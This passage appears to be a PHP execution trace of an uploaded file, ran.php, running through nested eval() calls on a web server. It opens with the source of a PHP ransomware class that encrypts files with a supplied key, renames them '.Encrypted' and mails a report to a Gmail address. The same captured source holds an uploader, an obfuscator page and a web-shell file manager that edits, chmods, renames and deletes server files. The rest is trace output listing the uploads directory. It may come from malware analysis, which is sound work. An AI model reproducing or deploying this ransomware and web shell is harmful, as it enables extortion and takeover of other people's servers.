"Report Ransomeware";\r\n $headers = "From: Tuyul \\r\\n";\r\n mail("TuyulJahat86@gmail.com",$subject,$message,$headers);\r\n }\r\n\r\n public function shcEnDesDirS($locate,$method){\r\n switch ($method) {\r\n case \'1\':\r\n rename($locate, $locate.".Encrypted");\r\n break;\r\n case \'2\':\r\n $locates = str_replace(".Encrypted", "", $locate);\r\n rename($locate, $locates);\r\n break;\r\n }\r\n }\r\n\r\n public function shcEnCry($key,$locate){\r\n $data = file_get_contents($locate);\r\n $iv = mcrypt_create_iv(\r\n mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),\r\n MCRYPT_DEV_URANDOM\r\n );\r\n\r\n $encrypted = base64_encode(\r\n $iv .\r\n mcrypt_encrypt(\r\n MCRYPT_RIJNDAEL_128,\r\n hash(\'sha256\', $key, true),\r\n $data,\r\n MCRYPT_MODE_CBC,\r\n $iv\r\n )\r\n );\r\n if(file_put_contents($locate, $encrypted )){\r\n echo \' Encrypted (Success) | \'.$locate.\'
\';\r\n }else{\r\n echo \' Encrypted (Failed) | \'.$locate.\'
\';\r\n }\r\n }\r\n\r\n public function shcDeCry($key,$locate){\r\n $data = base64_decode( file_get_contents($locate) );\r\n $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));\r\n\r\n $decrypted = rtrim(\r\n mcrypt_decrypt(\r\n MCRYPT_RIJNDAEL_128,\r\n hash(\'sha256\', $key, true),\r\n substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),\r\n MCRYPT_MODE_CBC,\r\n $iv\r\n ),\r\n "\\0"\r\n );\r\n if(file_put_contents($locate, $decrypted )){\r\n echo \' Decrypted (Success) | \'.$locate.\'
\';\r\n }else{\r\n echo \' Decrypted (Failed) | \'.$locate.\'
\';\r\n }\r\n }\r\n\r\n\r\n\r\n public function kecuali($ext,$name){\r\n $re = "/({$name})/";\r\n preg_match($re, $ext, $matches);\r\n if($matches[1]){\r\n return false;\r\n }\r\n return true;\r\n }\r\n}\r\n\r\nif($_POST[\'submit\']){\r\nswitch ($_POST[\'method\']) {\r\n case \'1\':\r\n deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST[\'key\']);\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST[\'key\']);\r\n break;\r\n}\r\n}else{\r\n?>\r\n
\r\n
\r\n\r\n
\r\n@@@@@                                        @@@@@  \r\n@@@@@@@                                      @@@@@@@\r\n@@@@@@@           @@@@@@@@@@@@@@@            @@@@@@@\r\n @@@@@@@@       @@@@@@@@@@@@@@@@@@@        @@@@@@@@ \r\n     @@@@@     @@@@@@@@@@@@@@@@@@@@@     @@@@@      \r\n       @@@@@  @@@@@@@@@@@@@@@@@@@@@@@  @@@@@        \r\n         @@  @@@@@@@@@@@@@@@@@@@@@@@@@  @@          \r\n            @@@@@@@    @@@@@@    @@@@@@             \r\n            @@@@@@      @@@@      @@@@@             \r\n            @@@@@@      @@@@      @@@@@             \r\n             @@@@@@    @@@@@@    @@@@@              \r\n              @@@@@@@@@@@  @@@@@@@@@@               \r\n               @@@@@@@@@@  @@@@@@@@@                \r\n           @@   @@@@@@@@@@@@@@@@@   @@              \r\n           @@@@  @@@@ @ @ @ @ @@@@  @@@@            \r\n          @@@@@   @@@ @ @ @ @ @@@   @@@@@           \r\n        @@@@@      @@@@@@@@@@@@@      @@@@@         \r\n      @@@@          @@@@@@@@@@@          @@@@       \r\n   @@@@@              @@@@@@@              @@@@@    \r\n  @@@@@@@                                 @@@@@@@   \r\n   @@@@@                                   @@@@@    \r\n\r\n -[ Contact : HackerBaloch07@gmail.com ]-\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n
\r\n\r\n
\r\n\r\n

\r\n

Uploader

\r\nAkses\r\n untuk $fullpath";\r\n } \r\n }echo \'
\';?>\r\n
\r\n
\r\n
\r\n\r\n\r\n\r\n\r\n\t\r\n\t\t\r\n\t\t\r\n\t\t\r\n\t\r\n\r\n\t\r\n\t\t
\r\n\t\t

Php Obfuscator By 5H311_1NJ3C706

\r\n\t\t
\r\n\t\t
\r\n\t\t
\t

paste your php code inside hit Enter done :P

\r\n\t\t
\r\n\t\t
\r\n\t\t\t
\r\n\t\t\t
\t

\r\n\t\t\t\t
\r\n\t\t\t
\t
\r\n\t\t\t\t
\r\n\t\t\t\t
\r\n\';\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t} \r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\r\n\t\t\t\t?>\r\n\t\t\t
\r\n\t\t\t
\r\n\t\t
\r\n\t\t
\r\n\t\t\t\r\n\t\t
\r\n\t\r\n\r\n\r\n $value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'\r\n\r\n\r\n\r\n5H311_1NJ3C706\r\n\r\n\r\n\r\n\r\n
\r\n

CRACKER BY 5H311_1NJ3C706

\r\n\r\n\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "
Current Dir : \';\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'/\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'\'.$pat.\'/\';\r\n}\r\necho \'
\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'Upload File Berhasil
\';\r\n}else{\r\necho \'Upload File Gagal
\';\r\n}\r\n}\r\necho \'
\r\nFile Upload :\r\n
\r\n
Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'

\';\r\necho(\'
\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'
\'.$_POST[\'path\'].\'

\';\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'Change Permission Berhasil
\';\r\n}else{\r\necho \'Change Permission Gagal
\';\r\n}\r\n}\r\necho \'
\r\nPermission : \r\n\r\n\r\n\r\n
\';\r\n}elseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'Berhasil Mengganti Nama
\';\r\n}else{\r\necho \'Gagal Mengganti Nama
\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'
\r\nNama Baru : \r\n\r\n\r\n\r\n
\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'Berhasil Edit File
\';\r\n}else{\r\necho \'Gagal Edit File
\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'
\r\n

\r\n\r\n\r\n\r\n
\';\r\n}\r\necho \'
\';\r\n}else{\r\necho \'
\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'Directory Berhasil Terhapus
\';\r\n}else{\r\necho \'Directory Gagal Terhapus
\';\r\n}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'File Berhasil Terhapus
\';\r\n}else{\r\necho \'File Gagal Dihapus
\';\r\n}\r\n}\r\n}\r\necho \'
\';\r\n$scandir = scandir($path);\r\necho \'
\r\n\r\n\r\n\r\n\r\n\r\n\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir($path.\'/\'.$dir) || $dir == \'.\' || $dir == \'..\') continue;\r\necho \'\r\n\r\n\r\n\r\n\r\n\';\r\n}\r\necho \'\';\r\nforeach($scandir as $file){\r\nif(!is_file($path.\'/\'.$file)) continue;\r\n$size = filesize($path.\'/\'.$file)/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho \'\r\n\r\n\r\n\r\n\r\n\';\r\n}\r\necho \'
Name
Size
Permission
Modify
\'.$dir.\'
----
\';\r\nif(is_writable($path.\'/\'.$dir)) echo \'\';\r\nelseif(!is_readable($path.\'/\'.$dir)) echo \'\';\r\necho perms($path.\'/\'.$dir);\r\nif(is_writable($path.\'/\'.$dir) || !is_readable($path.\'/\'.$dir)) echo \'\';\r\n\r\necho \'
\r\n\r\n\r\n\r\n\r\n\r\n
\'.$file.\'
\'.$size.\'
\';\r\nif(is_writable($path.\'/\'.$file)) echo \'\';\r\nelseif(!is_readable($path.\'/\'.$file)) echo \'\';\r\necho perms($path.\'/\'.$file);\r\nif(is_writable($path.\'/\'.$file) || !is_readable($path.\'/\'.$file)) echo \'\';\r\necho \'
\r\n\r\n\r\n\r\n\r\n\r\n
\r\n
\';\r\n}\r\necho \'

\r\n
Copyright © 2019 BLACK PHANTOM CYBER
\r\n\r\n\t\r\n\t\r\n\t\r\n\r\n\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n?>' /var/www/html/uploads/ran.php(10) : eval()'d code 1 0 4 16 0 0.004075 567832 error_reporting 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 38 1 0 4 16 1 0.004092 567872 4 16 R 22527 4 17 0 0.004106 567832 set_time_limit 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 39 1 0 4 17 1 0.004123 567896 4 17 R FALSE 4 18 0 0.004137 567864 ini_set 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 40 2 'memory_limit' '-1' 4 18 1 0.004153 567968 4 18 R '128M' 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 246 $files = NULL 4 19 0 0.004189 567976 error_reporting 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 380 1 0 4 19 1 0.004204 568016 4 19 R 0 4 20 0 0.004217 567976 set_time_limit 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 381 1 0 4 20 1 0.004232 568008 4 20 R FALSE 4 21 0 0.004245 567976 get_magic_quotes_gpc 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 383 0 4 21 1 0.004258 567976 4 21 R FALSE 4 22 0 0.004271 567976 getcwd 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 448 0 4 22 1 0.004286 568024 4 22 R '/var/www/html/uploads' 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 448 $path = '/var/www/html/uploads' 4 23 0 0.004312 568024 str_replace 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 450 3 '\\' '/' '/var/www/html/uploads' 4 23 1 0.004329 568120 4 23 R '/var/www/html/uploads' 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 450 $path = '/var/www/html/uploads' 4 24 0 0.004355 568024 explode 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 451 2 '/' '/var/www/html/uploads' 4 24 1 0.004372 568600 4 24 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'] 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 451 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads'] 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 0 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 455 $a = TRUE 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 1 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 2 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 3 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 4 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++ 4 25 0 0.004632 568528 scandir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 551 1 '/var/www/html/uploads' 4 25 1 0.004665 569144 4 25 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'ran.php'] 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 551 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'ran.php'] 4 26 0 0.004704 569160 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/.' 4 26 1 0.004721 569224 4 26 R TRUE 4 27 0 0.004735 569192 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/..' 4 27 1 0.004751 569240 4 27 R TRUE 4 28 0 0.004764 569200 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/.htaccess' 4 28 1 0.004780 569240 4 28 R FALSE 4 29 0 0.004794 569200 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/data' 4 29 1 0.004810 569240 4 29 R TRUE 4 30 0 0.004824 569200 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 566 1 '/var/www/html/uploads/data' 4 30 1 0.004841 569240 4 30 R TRUE 4 31 0 0.004856 569200 perms 1 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 568 1 '/var/www/html/uploads/data' 5 32 0 0.004869 569200 fileperms 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/data' 5 32 1 0.004883 569240 5 32 R 16895 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 16895 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 649 $info = 'd' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 666 $info .= 'x' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 670 $info .= 'w' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 673 $info .= 'x' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 677 $info .= 'w' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 680 $info .= 'x' 4 31 1 0.005019 569240 4 31 R 'drwxrwxrwx' 4 33 0 0.005034 569200 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 569 1 '/var/www/html/uploads/data' 4 33 1 0.005051 569240 4 33 R TRUE 4 34 0 0.005066 569208 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/prepend.php' 4 34 1 0.005082 569256 4 34 R FALSE 4 35 0 0.005095 569208 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/ran.php' 4 35 1 0.005111 569240 4 35 R FALSE 4 36 0 0.005125 569192 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/.' 4 36 1 0.005141 569224 4 36 R FALSE 4 37 0 0.005154 569192 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/..' 4 37 1 0.005169 569240 4 37 R FALSE 4 38 0 0.005182 569200 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/.htaccess' 4 38 1 0.005197 569240 4 38 R TRUE 4 39 0 0.005210 569200 filesize 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/.htaccess' 4 39 1 0.005224 569240 4 39 R 64 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 $size = 0.0625 4 40 0 0.005249 569144 round 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 2 0.0625 3 4 40 1 0.005263 569216 4 40 R 0.063 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 $size = 0.063 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 594 $size = '0.063 KB' 4 41 0 0.005301 569240 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/.htaccess' 4 41 1 0.005318 569280 4 41 R FALSE 4 42 0 0.005331 569240 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/.htaccess' 4 42 1 0.005346 569280 4 42 R TRUE 4 43 0 0.005359 569240 perms 1 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/.htaccess' 5 44 0 0.005373 569240 fileperms 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/.htaccess' 5 44 1 0.005386 569280 5 44 R 33188 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33188 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 666 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 670 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 673 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 680 $info .= '-' 4 43 1 0.005514 569280 4 43 R '-rw-r--r--' 4 45 0 0.005528 569240 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/.htaccess' 4 45 1 0.005544 569280 4 45 R FALSE 4 46 0 0.005557 569240 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/.htaccess' 4 46 1 0.005573 569280 4 46 R TRUE 4 47 0 0.005587 569240 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/data' 4 47 1 0.005603 569280 4 47 R FALSE 4 48 0 0.005617 569248 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/prepend.php' 4 48 1 0.005633 569296 4 48 R TRUE 4 49 0 0.005646 569256 filesize 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/prepend.php' 4 49 1 0.005660 569296 4 49 R 57 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 $size = 0.0556640625 4 50 0 0.005687 569152 round 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 2 0.0556640625 3 4 50 1 0.005702 569224 4 50 R 0.056 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 $size = 0.056 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 594 $size = '0.056 KB' 4 51 0 0.005739 569256 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/prepend.php' 4 51 1 0.005756 569296 4 51 R FALSE 4 52 0 0.005769 569256 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/prepend.php' 4 52 1 0.005785 569296 4 52 R TRUE 4 53 0 0.005798 569256 perms 1 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/prepend.php' 5 54 0 0.005812 569256 fileperms 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/prepend.php' 5 54 1 0.005826 569296 5 54 R 33261 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33261 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 666 $info .= 'x' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 670 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 673 $info .= 'x' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 680 $info .= 'x' 4 53 1 0.005954 569296 4 53 R '-rwxr-xr-x' 4 55 0 0.005968 569256 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/prepend.php' 4 55 1 0.005984 569296 4 55 R FALSE 4 56 0 0.005997 569256 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/prepend.php' 4 56 1 0.006013 569296 4 56 R TRUE 4 57 0 0.006163 569248 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/ran.php' 4 57 1 0.006180 569280 4 57 R TRUE 4 58 0 0.006194 569240 filesize 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/ran.php' 4 58 1 0.006209 569280 4 58 R 13921 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 $size = 13.5947265625 4 59 0 0.006235 569144 round 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 2 13.5947265625 3 4 59 1 0.006250 569216 4 59 R 13.595 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 $size = 13.595 3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 594 $size = '13.595 KB' 4 60 0 0.006288 569240 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/ran.php' 4 60 1 0.006305 569280 4 60 R FALSE 4 61 0 0.006319 569240 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/ran.php' 4 61 1 0.006335 569280 4 61 R TRUE 4 62 0 0.006348 569240 perms 1 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/ran.php' 5 63 0 0.006362 569240 fileperms 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/ran.php' 5 63 1 0.006376 569280 5 63 R 33204 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33204 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 666 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 670 $info .= 'w' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 673 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-' 4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 680 $info .= '-' 4 62 1 0.006510 569280 4 62 R '-rw-rw-r--' 4 64 0 0.006524 569240 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/ran.php' 4 64 1 0.006541 569280 4 64 R FALSE 4 65 0 0.006554 569240 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/ran.php' 4 65 1 0.006570 569280 4 65 R TRUE 3 15 1 0.006586 569184 2 7 1 0.006598 510632 0.006621 428648 TRACE END [2023-02-13 02:37:46.171670]